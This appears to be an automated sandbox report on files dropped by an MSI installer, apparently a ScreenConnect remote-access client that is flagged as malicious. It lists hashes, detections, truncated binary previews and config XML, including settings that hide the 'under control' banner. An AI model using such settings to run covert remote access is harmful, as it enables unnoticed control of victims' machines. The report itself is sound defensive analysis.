                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):50133
                                                                                            Entropy (8bit):4.759054454534641
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                            MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                            SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                            SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                            SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                            Malicious:false
                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):26722
                                                                                            Entropy (8bit):7.7401940386372345
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                            MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                            SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                            SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                            SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                            Malicious:false
                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):197120
                                                                                            Entropy (8bit):6.58476728626163
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                            MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                            SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                            SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                            SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: statsment.exe, Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: setup.msi, Detection: malicious, Browse
                                                                                            • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                            • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):68096
                                                                                            Entropy (8bit):6.068776675019683
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                            MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                            SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                            SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                            SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: statsment.exe, Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: setup.msi, Detection: malicious, Browse
                                                                                            • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                            • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):95520
                                                                                            Entropy (8bit):6.505346220942731
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                            MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                            SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                            SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                            SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):548864
                                                                                            Entropy (8bit):6.031251664661689
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                            MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                            SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                            SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                            SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1721856
                                                                                            Entropy (8bit):6.639136400085158
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                            MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                            SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                            SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                            SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):260168
                                                                                            Entropy (8bit):6.416438906122177
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                            MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                            SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                            SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                            SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):61216
                                                                                            Entropy (8bit):6.31175789874945
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                            MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                            SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                            SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                            SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):4.842791478883622
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):601376
                                                                                            Entropy (8bit):6.185921191564225
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                            MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                            SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                            SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                            SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):4.842791478883622
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                            Malicious:true
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):842248
                                                                                            Entropy (8bit):6.268561504485627
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                            MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                            SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                            SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                            SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):81696
                                                                                            Entropy (8bit):5.862223562830496
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                            MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                            SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                            SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                            SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):4.842791478883622
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):3343
                                                                                            Entropy (8bit):4.771733209240506
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                            MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                            SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                            SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                            SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):939
                                                                                            Entropy (8bit):5.796466792414452
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                                                            MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                                                            SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                                                            SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                                                            SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                                                            Malicious:false
